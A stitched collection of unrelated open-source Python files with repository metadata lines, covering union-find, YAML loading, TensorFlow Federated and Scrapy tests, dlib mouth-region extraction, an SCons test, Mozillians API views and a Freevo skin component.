def union(self, elem_x, elem_y, visual = False):
"""
Attempts to join 2 group belonging to 2 elements
Args:
elem_x: Index of an 1st element in the disjoint set
elem_y: Index of an 2nd element in the disjoint set
visual: Set to True for additional screen output
Time:
O(1) [Amortized]
Explanation:
Set the representative of the representative of the smaller group
to be the repsentative of the larger group
Path compression in find() automatically updates the rest
"""
if self._oor(elem_x) or self._oor(elem_y):
if visual:
print("Union unsuccessful: index out of range")
return
x_parent = self.find(elem_x)
y_parent = self.find(elem_y)
if x_parent == y_parent:
if visual:
print("Union unsuccessful: {} and {} in same group".format(elem_x, elem_y, x_parent))
return
if self.size[x_parent] < self.size[y_parent]:
self.parent[x_parent] = y_parent
self.size[y_parent] += self.size[x_parent]
else:
self.parent[y_parent] = x_parent
self.size[x_parent] += self.size[y_parent] | mit | 285,275,668,632,747,780 | 24.547619 | 89 | 0.669075 | false |
toumorokoshi/miura | miura/data.py | 1 | 2224 | import os
import re
import yaml
from .exceptions import MiuraException
import logging
logger = logging.getLogger(__name__)
def load_data_from_path(path):
file_paths = load_file_or_directory(path)
return retrieve_data(file_paths)
def load_file_or_directory(path):
"""
given a path, determine if the path is a file or directory, and
yield a list of absolute file paths
"""
assert os.path.exists(path), "{0} does not exist!".format(path)
absolute_path = os.path.abspath(path)
if not os.path.isdir(path):
yield absolute_path
else:
for root, dirs, file_paths in os.walk(path):
for file_path in file_paths:
yield os.path.join(root, file_path)
def retrieve_data(file_paths):
"""
passed an iterable list of file_paths, loop through all of them and
generate a dictionary containing all the context
"""
data_dict = {}
for file_path in file_paths:
with open(file_path) as fh:
try:
content = yaml.load(fh.read())
except yaml.YAMLError as e:
raise MiuraException(
"Unable to parse yaml at {0}: \n {1}".format(
file_path,
str(e)
))
if not isinstance(content, dict):
raise MiuraException(
"{0} is does not translate to a dictionary!".format(file_path)
)
data_dict.update(content)
return data_dict
def filter_data(data, filter_dict):
""" filter a data dictionary for values only matching the filter """
for key, match_string in filter_dict.items():
if key not in data:
logger.warning("{0} doesn't match a top level key".format(key))
continue
values = data[key]
matcher = re.compile(match_string)
if isinstance(values, list):
values = [v for v in values if matcher.search(v)]
elif isinstance(values, dict):
values = dict((k, v) for k, v in values.items() if matcher.search(k))
else:
raise MiuraException("cannot filter a {0}".format(type(values)))
data[key] = values
| mit | -9,030,993,943,274,022,000 | 31.231884 | 82 | 0.582284 | false |
tensorflow/federated | tensorflow_federated/python/simulation/datasets/client_data_test.py | 1 | 13504 | # Copyright 2018, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Union
import warnings
from absl.testing import parameterized
import tensorflow as tf
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.backends.native import execution_contexts
from tensorflow_federated.python.simulation.datasets import client_data as cd
def create_concrete_client_data(
serializable: bool = False,
) -> Union[cd.ConcreteSerializableClientData, cd.ConcreteClientData]:
"""Creates a simple `ConcreteSerializableClientData` instance.
The resulting `ClientData` has the following clients and datasets (written as
lists):
* client `1`: [0]
* client `2`: [0, 1]
* client `3`: [0, 1, 2]
Args:
serializable: A boolean indicating whether to create a `ConcreteClientData`
(`serializable = False`) or a `ConcreteSerializableClientData`
(`serializable = True`).
Returns:
A `ConcreteSerializableClientData` instance.
"""
client_ids = ['1', '2', '3']
def create_dataset_fn(client_id):
num_examples = tf.strings.to_number(client_id, out_type=tf.int64)
return tf.data.Dataset.range(num_examples)
if serializable:
concrete_client_data = cd.ClientData.from_clients_and_tf_fn(
client_ids=client_ids, serializable_dataset_fn=create_dataset_fn)
else:
concrete_client_data = cd.ClientData.from_clients_and_fn(
client_ids=client_ids,
create_tf_dataset_for_client_fn=create_dataset_fn)
return concrete_client_data
def dataset_length(dataset):
return dataset.reduce(0, lambda x, _: x + 1)
class TrainTestClientSplitTest(tf.test.TestCase):
def get_even_odd_client_data(self):
"""Creates a `ClientData` where only clients with even IDs have data."""
def create_dataset_fn(client_id):
client_id_as_int = tf.strings.to_number(client_id, out_type=tf.int64)
num_examples = 1 if client_id_as_int % 2 == 0 else 0
return tf.data.Dataset.range(num_examples)
client_ids = [str(x) for x in range(10)]
return cd.ClientData.from_clients_and_tf_fn(
client_ids=client_ids, serializable_dataset_fn=create_dataset_fn)
def test_split_train_test_selects_nonempty_test_clients(self):
# Only even client_ids have data:
client_data = self.get_even_odd_client_data()
train, test = cd.ClientData.train_test_client_split(
client_data, num_test_clients=3)
# Test that all clients end up in one of the two ClientData:
self.assertCountEqual(client_data.client_ids,
train.client_ids + test.client_ids)
self.assertLen(test.client_ids, 3)
for client_id in test.client_ids:
self.assertEqual(int(client_id) % 2, 0)
train, test = cd.ClientData.train_test_client_split(
client_data, num_test_clients=5)
self.assertLen(test.client_ids, 5)
self.assertLen(train.client_ids, 5)
def test_split_train_test_not_enough_nonempty_clients(self):
client_data = self.get_even_odd_client_data()
with self.assertRaisesRegex(ValueError, 'too many clients with no data.'):
cd.ClientData.train_test_client_split(client_data, num_test_clients=6)
def test_split_train_test_too_few_clients(self):
client_data = self.get_even_odd_client_data()
with self.assertRaisesRegex(ValueError, 'has only 10 clients.*11'):
cd.ClientData.train_test_client_split(client_data, num_test_clients=11)
def test_split_train_test_no_test_clients_requested(self):
client_data = self.get_even_odd_client_data()
with self.assertRaisesRegex(ValueError, 'Please specify'):
cd.ClientData.train_test_client_split(client_data, num_test_clients=0)
def test_split_train_test_fixed_seed(self):
client_data = self.get_even_odd_client_data()
train_0, test_0 = cd.ClientData.train_test_client_split(
client_data, num_test_clients=3, seed=0)
train_1, test_1 = cd.ClientData.train_test_client_split(
client_data, num_test_clients=3, seed=0)
self.assertEqual(train_0.client_ids, train_1.client_ids)
self.assertEqual(test_0.client_ids, test_1.client_ids)
class ConcreteClientDataTest(tf.test.TestCase, parameterized.TestCase):
def test_deprecation_warning_raised_on_from_clients_and_fn(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
create_concrete_client_data(serializable=False)
self.assertNotEmpty(w)
self.assertEqual(w[0].category, DeprecationWarning)
self.assertRegex(
str(w[0].message),
'tff.simulation.datasets.ClientData.from_clients_and_fn is deprecated'
)
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_concrete_client_data_create_expected_datasets(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
self.assertEqual(client_data.element_type_structure,
tf.TensorSpec(shape=(), dtype=tf.int64))
for i in client_data.client_ids:
client_dataset = client_data.create_tf_dataset_for_client(i)
self.assertEqual(dataset_length(client_dataset), int(i))
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_datasets_lists_all_elements(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
def ds_iterable_to_list_set(datasets):
return set(tuple(ds.as_numpy_iterator()) for ds in datasets)
datasets = ds_iterable_to_list_set(client_data.datasets())
expected = ds_iterable_to_list_set(
(client_data.create_tf_dataset_for_client(cid)
for cid in client_data.client_ids))
self.assertEqual(datasets, expected)
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_datasets_is_lazy(self, serializable):
client_ids = [1, 2, 3]
# Note: this is called once on initialization of ClientData
# with client_ids[0] in order to get the element type.
# After that, it should be called lazily when `next` is called
# on a `.datasets()` iterator.
called_count = 0
def only_call_me_thrice(client_id):
nonlocal called_count
called_count += 1
if called_count == 1:
self.assertEqual(client_id, client_ids[0])
if called_count > 3:
raise Exception('called too many times')
num_examples = client_id
return tf.data.Dataset.range(num_examples)
if serializable:
client_data = cd.ClientData.from_clients_and_tf_fn(
client_ids=client_ids, serializable_dataset_fn=only_call_me_thrice)
else:
client_data = cd.ClientData.from_clients_and_fn(
client_ids=client_ids,
create_tf_dataset_for_client_fn=only_call_me_thrice)
datasets_iter = client_data.datasets()
next(datasets_iter)
next(datasets_iter)
with self.assertRaisesRegex(Exception, 'called too many times'):
next(datasets_iter)
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_datasets_limit_count(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
dataset_list = list(client_data.datasets(limit_count=1))
self.assertLen(dataset_list, 1)
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_datasets_doesnt_shuffle_client_ids_list(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
client_ids_copy = client_data.client_ids.copy()
client_data.datasets()
self.assertEqual(client_data.client_ids, client_ids_copy)
client_data.datasets()
self.assertEqual(client_data.client_ids, client_ids_copy)
client_data.datasets()
self.assertEqual(client_data.client_ids, client_ids_copy)
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_create_tf_dataset_from_all_clients(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
dataset = client_data.create_tf_dataset_from_all_clients()
dataset_list = list(dataset.as_numpy_iterator())
self.assertCountEqual(dataset_list, [0, 0, 0, 1, 1, 2])
class ConcreteSerializableClientDataTest(tf.test.TestCase):
def test_dataset_computation_lists_all_elements(self):
client_data = create_concrete_client_data(serializable=True)
for client_id in client_data.client_ids:
expected_values = list(range(int(client_id)))
client_dataset = client_data.dataset_computation(client_id)
actual_values = list(client_dataset.as_numpy_iterator())
self.assertEqual(expected_values, actual_values)
def test_dataset_from_large_client_list(self):
client_ids = [str(x) for x in range(1_000_000)]
def create_dataset(_):
return tf.data.Dataset.range(100)
client_data = cd.ClientData.from_clients_and_tf_fn(
client_ids=client_ids, serializable_dataset_fn=create_dataset)
# Ensure this completes within the test timeout without raising error.
# Previous implementations caused this to take an very long time via Python
# list -> generator -> list transformations.
try:
client_data.create_tf_dataset_from_all_clients(seed=42)
except Exception as e: # pylint: disable=broad-except
self.fail(e)
class PreprocessClientDataTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_preprocess_creates_expected_client_datasets(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
def preprocess_fn(dataset):
return dataset.map(lambda x: 2 * x)
preprocess_client_data = client_data.preprocess(preprocess_fn)
for client_id in client_data.client_ids:
expected_dataset = [2 * a for a in range(int(client_id))]
actual_dataset = preprocess_client_data.create_tf_dataset_for_client(
client_id)
self.assertEqual(expected_dataset,
list(actual_dataset.as_numpy_iterator()))
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_preprocess_with_take_one(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
preprocess_fn = lambda x: x.take(1)
preprocess_client_data = client_data.preprocess(preprocess_fn)
for client_id in client_data.client_ids:
dataset = preprocess_client_data.create_tf_dataset_for_client(client_id)
self.assertEqual(dataset_length(dataset), 1)
self.assertLen(
client_data.client_ids,
dataset_length(
preprocess_client_data.create_tf_dataset_from_all_clients()))
def test_preprocess_creates_expected_client_datasets_with_dataset_comp(self):
# We only use `serializable=True`, since it has a `dataset_computation`
# attribute.
client_data = create_concrete_client_data(serializable=True)
def preprocess_fn(dataset):
return dataset.map(lambda x: 2 * x)
preprocess_client_data = client_data.preprocess(preprocess_fn)
for client_id in client_data.client_ids:
expected_dataset = [2 * a for a in range(int(client_id))]
actual_dataset = preprocess_client_data.dataset_computation(client_id)
self.assertEqual(expected_dataset,
list(actual_dataset.as_numpy_iterator()))
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_preprocess_creates_expected_amalgamated_dataset(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
def preprocess_fn(dataset):
return dataset.map(lambda x: 2 * x)
preprocess_client_data = client_data.preprocess(preprocess_fn)
expected_amalgamated_dataset = [0, 0, 2, 0, 2, 4]
actual_amalgamated_dataset = (
preprocess_client_data.create_tf_dataset_from_all_clients())
self.assertCountEqual(expected_amalgamated_dataset,
list(actual_amalgamated_dataset.as_numpy_iterator()))
@parameterized.named_parameters(('nonserializable', False),
('serializable', True))
def test_preprocess_raises_on_tff_computation(self, serializable):
client_data = create_concrete_client_data(serializable=serializable)
@computations.tf_computation
def foo():
return 1
with self.assertRaises(cd.IncompatiblePreprocessFnError):
client_data.preprocess(foo)
if __name__ == '__main__':
execution_contexts.set_local_execution_context()
tf.test.main()
| apache-2.0 | 6,593,200,390,063,470,000 | 39.797583 | 80 | 0.693868 | false |
georgesterpu/pyVSR | pyVSR/Features/roi.py | 1 | 9014 | from .feature import Feature
from urllib import request
import os
import cv2
import dlib
import numpy as np
from .. import utils
class ROIFeature(Feature):
r"""
Mouth ROI Extraction pipeline using OpenCV and dlib
Similar functionality, but without facial alignment, exists in DCTFeature. It will
soon get deprecated.
Main steps:
1) face detection - dlib mmod cnn
2) face alignment - dlib 5 landmark prediction, alignment and cropping
3) face shape prediction - dlib 68 landmark prediction
4) mouth cropping - segment the aligned face around the lip coordinates (landmarks [48:68])
"""
def __init__(self,
extract_opts=None):
r"""
Parameters
----------
extract_opts : `dict` holding the configuration for feature extraction
Must specify the following options:
``gpu`` : `boolean`, whether to use the dlib's CNN-based face detector (`True`)
or the traditional dlib HOG-based face detector (`False`)
``align``: `boolean`, if True (default), it uses dlib face alignment based on 5
stable landmarks
``color`` : `boolean`, store RGB images (`True`) or grayscale images (`False`)
``border`` : `int`, number of pixels to pad the tightly-cropped mouth region
``window_size`` : `tuple` of two `ints`, one for each image dimension (width, height)
Represents the sub-sampled ROI window size, hence the full DCT matrix has the same shape
output_dir
"""
# if extract_opts is not None:
# if 'need_coords' in extract_opts:
# self._need_coords = extract_opts['need_coords']
if 'window_size' not in extract_opts:
raise Exception('window_size is mandatory')
self._xres = extract_opts['window_size'][0]
self._yres = extract_opts['window_size'][1]
if 'align' in extract_opts:
self._align = extract_opts['align']
else:
self._align = True
if 'color' in extract_opts:
self._channels = 3 if extract_opts['color'] is True else 1
if 'border' in extract_opts:
self._border = extract_opts['border']
else:
self._border = 0
if 'gpu' in extract_opts:
self._gpu = extract_opts['gpu']
self._detector_path, self._predictor5_path, self._predictor68_path = maybe_download_models()
def extract_save_features(self, example):
r"""
Parameters
----------
file : `str`, path to video file
Returns
-------
"""
# Not all the fitters are pickleable for multiprocessing to work
# thus load the fitters for every process
# outfile = utils.file_to_feature(file, extension='.h5', tree_leaves=self._tree_leaves)
# if os.path.isfile(os.path.join(self._output_dir, outfile)):
# return
input_file = example[0]
output_file = example[1]
if os.path.isfile(output_file):
return
print(input_file)
self._preload_dlib_detector_fitter()
roi_sequence = self.extract_roi_sequence(input_file)
_write_sequence_to_file(output_file, roi_sequence, 'sequence', (None, None, None, None))
def extract_roi_sequence(self, file):
stream = cv2.VideoCapture(file)
vidframes = int(stream.get(cv2.CAP_PROP_FRAME_COUNT))
roi_seq = np.zeros((vidframes, self._yres, self._xres, self._channels), dtype=np.float32)
current_frame = 0
while stream.isOpened():
ret, frame = stream.read()
if ret is False:
break
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) # dlib and opencv use different channel representations
detections = self._detect(frame, 0)
if len(detections) > 0: # else the buffer will preserve the zeros initialisation
bbox = detections[0]
left, top, right, bottom = _get_bbox_corners(bbox, frame.shape, self._gpu)
# print(left, top, right, bottom, frame.shape)
if self._align is True:
face_coords = dlib.rectangle(left, top, right, bottom)
landmarks5 = self._fitter5(frame, face_coords)
face_img = dlib.get_face_chip(frame, landmarks5, 256)
face_img = np.asarray(face_img)
else:
face_img = frame[top:bottom, left:right]
face_img = cv2.resize(face_img, (160, 160), interpolation=cv2.INTER_CUBIC)
face_chip_area = dlib.rectangle(0, 0, face_img.shape[0], face_img.shape[1])
landmarks68 = self._fitter68(face_img, face_chip_area)
arr = _dlib_parts_to_numpy(landmarks68)[48:68]
top_left, bottom_right = _get_array_bounds(arr, face_img.shape, border=self._border)
mouth_crop = face_img[top_left[1]:bottom_right[1], top_left[0]:bottom_right[0], :]
mouth_crop_resized = cv2.resize(mouth_crop, (self._xres, self._yres), cv2.INTER_AREA)
if self._channels == 3:
roi_seq[current_frame, :] = cv2.cvtColor(mouth_crop_resized, cv2.COLOR_RGB2BGR) / 255
else:
gray_roi = cv2.cvtColor(mouth_crop_resized, cv2.COLOR_RGB2GRAY) / 255
roi_seq[current_frame, :] = np.expand_dims(gray_roi, -1)
# # Enable these when debugging # #
# cv2.imshow('', roi_seq[current_frame, :])
# cv2.waitKey(1)
current_frame += 1
stream.release()
# cv2.destroyAllWindows()
return roi_seq
def _preload_dlib_detector_fitter(self):
r"""
Returns the dlib face detector and the landmark fitters (5 and 68 landmarks)
-------
"""
if self._gpu is True:
self._detect = dlib.cnn_face_detection_model_v1(self._detector_path)
else:
self._detect = dlib.get_frontal_face_detector()
self._fitter5 = dlib.shape_predictor(self._predictor5_path)
self._fitter68 = dlib.shape_predictor(self._predictor68_path)
def get_feature(self, file, feat_opts):
pass
def _write_sequence_to_file(file, seq, seq_name, seq_shape):
import h5py
os.makedirs(os.path.dirname(file), exist_ok=True)
f = h5py.File(file, 'w')
f.create_dataset(seq_name, data=seq.astype('float32'),
maxshape=seq_shape,
compression="gzip",
fletcher32=True)
f.close()
return
def maybe_download_models():
r"""
-------
"""
os.makedirs('./stored_models/', exist_ok=True)
face_detector = 'https://github.com/georgesterpu/stored_models/raw/master/mmod_human_face_detector.dat'
lm_predictor_5 = 'https://github.com/georgesterpu/stored_models/raw/master/shape_predictor_5_face_landmarks.dat'
lm_predictor_68 = 'https://github.com/georgesterpu/stored_models/raw/master/shape_predictor_68_face_landmarks.dat'
detector_path = './stored_models/detector.dat'
if not os.path.isfile(detector_path):
print('Downloading face detector')
request.urlretrieve(face_detector, detector_path)
predictor5_path = './stored_models/predictor5.dat'
if not os.path.isfile(predictor5_path):
print('Downloading landmark predictor5')
request.urlretrieve(lm_predictor_5, predictor5_path)
predictor68_path = './stored_models/predictor68.dat'
if not os.path.isfile(predictor68_path):
print('Downloading landmark predictor68')
request.urlretrieve(lm_predictor_68, predictor68_path)
return detector_path, predictor5_path, predictor68_path
def _dlib_parts_to_numpy(landmarks):
parts = landmarks.parts()
arr = []
for part in parts:
arr.append((part.x, part.y))
return np.asarray(arr)
def _get_array_bounds(arr, outer_shape, border=0):
# TODO : make border padding relative to bbox size
top_left = np.min(arr, axis=0)
bottom_right = np.max(arr, axis=0)
top_left[0] = np.maximum(top_left[0] - border, 0)
top_left[1] = np.maximum(top_left[1] - border, 0)
bottom_right[0] = np.minimum(bottom_right[0] + border, outer_shape[0])
bottom_right[1] = np.minimum(bottom_right[1] + border, outer_shape[1])
return tuple(top_left), tuple(bottom_right)
def _get_bbox_corners(bbox, frame_shape, gpu):
if gpu is True:
left, top, right, bottom = bbox.rect.left(), bbox.rect.top(), bbox.rect.right(), bbox.rect.bottom()
else:
left, top, right, bottom = bbox.left(), bbox.top(), bbox.right(), bbox.bottom()
# clip values
left, top = (np.maximum(left, 0), np.maximum(top, 0))
right, bottom = (np.minimum(right, frame_shape[1]), np.minimum(bottom, frame_shape[0]))
return left, top, right, bottom
| gpl-3.0 | -8,871,520,345,047,346,000 | 34.34902 | 118 | 0.59929 | false |
eLRuLL/scrapy | tests/test_spidermiddleware_offsite.py | 1 | 3154 | from unittest import TestCase
from urllib.parse import urlparse
import warnings
from scrapy.http import Response, Request
from scrapy.spiders import Spider
from scrapy.spidermiddlewares.offsite import OffsiteMiddleware, URLWarning
from scrapy.utils.test import get_crawler
class TestOffsiteMiddleware(TestCase):
def setUp(self):
crawler = get_crawler(Spider)
self.spider = crawler._create_spider(**self._get_spiderargs())
self.mw = OffsiteMiddleware.from_crawler(crawler)
self.mw.spider_opened(self.spider)
def _get_spiderargs(self):
return dict(name='foo', allowed_domains=['scrapytest.org', 'scrapy.org', 'scrapy.test.org'])
def test_process_spider_output(self):
res = Response('http://scrapytest.org')
onsite_reqs = [Request('http://scrapytest.org/1'),
Request('http://scrapy.org/1'),
Request('http://sub.scrapy.org/1'),
Request('http://offsite.tld/letmepass', dont_filter=True),
Request('http://scrapy.test.org/')]
offsite_reqs = [Request('http://scrapy2.org'),
Request('http://offsite.tld/'),
Request('http://offsite.tld/scrapytest.org'),
Request('http://offsite.tld/rogue.scrapytest.org'),
Request('http://rogue.scrapytest.org.haha.com'),
Request('http://roguescrapytest.org'),
Request('http://test.org/'),
Request('http://notscrapy.test.org/')]
reqs = onsite_reqs + offsite_reqs
out = list(self.mw.process_spider_output(res, reqs, self.spider))
self.assertEqual(out, onsite_reqs)
class TestOffsiteMiddleware2(TestOffsiteMiddleware):
def _get_spiderargs(self):
return dict(name='foo', allowed_domains=None)
def test_process_spider_output(self):
res = Response('http://scrapytest.org')
reqs = [Request('http://a.com/b.html'), Request('http://b.com/1')]
out = list(self.mw.process_spider_output(res, reqs, self.spider))
self.assertEqual(out, reqs)
class TestOffsiteMiddleware3(TestOffsiteMiddleware2):
def _get_spider(self):
return Spider('foo')
class TestOffsiteMiddleware4(TestOffsiteMiddleware3):
def _get_spider(self):
bad_hostname = urlparse('http:////scrapytest.org').hostname
return dict(name='foo', allowed_domains=['scrapytest.org', None, bad_hostname])
def test_process_spider_output(self):
res = Response('http://scrapytest.org')
reqs = [Request('http://scrapytest.org/1')]
out = list(self.mw.process_spider_output(res, reqs, self.spider))
self.assertEqual(out, reqs)
class TestOffsiteMiddleware5(TestOffsiteMiddleware4):
def test_get_host_regex(self):
self.spider.allowed_domains = ['http://scrapytest.org', 'scrapy.org', 'scrapy.test.org']
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.mw.get_host_regex(self.spider)
assert issubclass(w[-1].category, URLWarning)
| bsd-3-clause | 6,963,903,261,428,702,000 | 37.463415 | 100 | 0.630945 | false |
EmanueleCannizzaro/scons | test/implicit-cache/SetOption.py | 1 | 2207 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/implicit-cache/SetOption.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that SetOption('implicit_cache', 1) actually enables implicit
caching by detecting the case where implicit caching causes inaccurate
builds: a same-named file dropped into a directory earlier in the
CPPPATH list will *not* be detected because we use what's in the cache.
"""
import TestSCons
test = TestSCons.TestSCons()
test.write('SConstruct', """
SetOption('implicit_cache', 1)
env=Environment(CPPPATH=['i1', 'i2'])
env.Object('foo.c')
""")
test.subdir('i1')
test.subdir('i2')
test.write('foo.c', """
#include <foo.h>
void foo(void)
{
FOO_H_DEFINED
++x; /* reference x */
}
""")
test.write('i2/foo.h', """
#define FOO_H_DEFINED int x = 1;
""")
test.run(arguments = '.')
test.write('i1/foo.h', """
this line will cause a syntax error if it's included by a rebuild
""");
test.up_to_date(arguments = '.')
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mit | -2,257,779,366,836,436,500 | 28.039474 | 106 | 0.729497 | false |
safwanrahman/mozillians | mozillians/groups/api/v2.py | 1 | 3872 | from django.shortcuts import get_object_or_404
import django_filters
from funfactory.urlresolvers import reverse
from rest_framework import viewsets, serializers
from rest_framework.response import Response
from mozillians.common.helpers import absolutify
from mozillians.groups.models import Group, GroupMembership, Skill
from mozillians.users.models import UserProfile
class GroupMemberSerializer(serializers.HyperlinkedModelSerializer):
privacy = serializers.CharField(source='get_privacy_groups_display')
username = serializers.Field(source='user.username')
class Meta:
model = UserProfile
fields = ('privacy', 'username', '_url')
class GroupSerializer(serializers.HyperlinkedModelSerializer):
member_count = serializers.Field()
url = serializers.SerializerMethodField('get_url')
class Meta:
model = Group
fields = ('id', 'url', 'name', 'member_count', '_url')
def get_url(self, obj):
return absolutify(reverse('groups:show_group', kwargs={'url': obj.url}))
class GroupDetailedSerializer(GroupSerializer):
members = GroupMemberSerializer(many=True, source='_members')
class Meta:
model = Group
fields = ('id', 'name', 'description', 'curator',
'irc_channel', 'website', 'wiki',
'members_can_leave', 'accepting_new_members',
'new_member_criteria', 'functional_area', 'members', 'url')
class SkillSerializer(serializers.HyperlinkedModelSerializer):
member_count = serializers.Field()
url = serializers.SerializerMethodField('get_url')
class Meta:
model = Skill
fields = ('id', 'url', 'name', 'member_count', '_url')
def get_url(self, obj):
return absolutify(reverse('groups:show_skill', kwargs={'url': obj.url}))
class SkillDetailedSerializer(SkillSerializer):
members = GroupMemberSerializer(many=True, source='_members')
class Meta:
model = Skill
fields = ('id', 'name', 'members', 'url')
class GroupFilter(django_filters.FilterSet):
class Meta:
model = Group
fields = ('name', 'functional_area', 'curator',
'members_can_leave', 'accepting_new_members',)
class SkillFilter(django_filters.FilterSet):
class Meta:
model = Skill
fields = ('name',)
class GroupViewSet(viewsets.ReadOnlyModelViewSet):
"""
Returns a list of Mozillians groups respecting authorization
levels and privacy settings.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
ordering = 'name'
ordering_fields = ('name', 'member_count')
filter_class = GroupFilter
def get_queryset(self):
queryset = Group.objects.filter(visible=True)
return queryset
def retrieve(self, request, pk):
group = get_object_or_404(self.get_queryset(), pk=pk)
# Exclude members in 'pending' state
group._members = group.members.filter(privacy_groups__gte=self.request.privacy_level,
groupmembership__status=GroupMembership.MEMBER)
serializer = GroupDetailedSerializer(group, context={'request': self.request})
return Response(serializer.data)
class SkillViewSet(viewsets.ReadOnlyModelViewSet):
"""
Returns a list of Mozillians skills respecting authorization
levels and privacy settings.
"""
queryset = Skill.objects.all()
serializer_class = SkillSerializer
ordering_fields = ('name',)
filter_class = SkillFilter
def retrieve(self, request, pk):
skill = get_object_or_404(self.queryset, pk=pk)
skill._members = skill.members.filter(privacy_groups__gte=self.request.privacy_level)
serializer = SkillDetailedSerializer(skill, context={'request': self.request})
return Response(serializer.data)
| bsd-3-clause | 8,867,633,374,129,686,000 | 31.537815 | 93 | 0.673037 | false |
freevo/freevo1 | src/skins/main/textentry_area.py | 1 | 3760 | # -*- coding: iso-8859-1 -*-
# -----------------------------------------------------------------------
# scrollabletext_area.py - A scrollable text area for the Freevo skin
# -----------------------------------------------------------------------
# $Id$
#
# Notes:
# Todo:
#
# -----------------------------------------------------------------------
# Freevo - A Home Theater PC framework
# Copyright (C) 2002 Krister Lagerstrom, et al.
# Please see the file freevo/Docs/CREDITS for a complete list of authors.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MER-
# CHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# -----------------------------------------------------------------------
import copy
import types
from area import Skin_Area
from skin_utils import *
from skin import eval_attr
import config
class Textentry_Area(Skin_Area):
"""
this call defines the Text Entry area
"""
def __init__(self):
Skin_Area.__init__(self, 'textentry')
self.text_entry = None
def update_content_needed(self):
"""
check if the content needs an update
"""
return True
def update_content(self):
"""
update the listing area
"""
menuw = self.menuw
settings = self.settings
layout = self.layout
area = self.area_val
content = self.calc_geometry(layout.content, copy_object=True)
if not hasattr(menuw, "text_entry"):
return
text_entry = menuw.text_entry
if self.text_entry != text_entry:
self.text_entry = text_entry
self.offset = 0
text = ''
total_width = 0
font = content.font
width = content.width
caret_x = 0
offset = self.offset
caret_position = text_entry.caret_position
pygame_font = font.font.font
if offset > caret_position:
offset = caret_position - 1
if offset < 0:
offset = 0
else:
total_width = 0
new_offset = caret_position
for i in range(caret_position, -1, -1):
temp_text = text_entry.text[i:caret_position]
total_width = font.font.stringsize(temp_text)
if total_width > width:
break
offset = i
self.offset = offset
total_width = 0
for i in range(offset, len(text_entry.text)):
total_width = font.font.stringsize(text_entry.text[offset:i+1])
if total_width > width:
break
text = text_entry.text[offset:i+1]
caret_text = text[:caret_position - offset]
# We need a more exact position than is returned by the OSDFont class (which
# caches character sizes but doesn't take account of kerning)
caret_x,h = pygame_font.size(caret_text)
# Draw Caret
self.drawroundbox(content.x + caret_x, content.y, 2, content.height, (content.color, 0, 0x00000000, 0))
# Draw text
self.drawstring(text, font, content, x=content.x, align_v='center', ellipses='', dim=False)
| gpl-2.0 | 3,474,443,716,475,095,000 | 31.136752 | 111 | 0.561702 | false |
KarateJB/Python.Practice | src/TensorFlow/venv/Lab/Tutorials/Sample/LinearRegression_tb.py | 1 | 2301 | """Linear Regression
https://brohrer.mcknote.com/zh-Hant/how_machine_learning_works/how_linear_regression_works.html
"""
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
# Parameters
